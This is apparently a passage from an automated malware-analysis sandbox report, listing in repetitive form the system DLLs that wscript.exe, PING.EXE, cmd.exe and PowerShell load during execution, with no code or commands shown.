            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: webio.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: webio.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
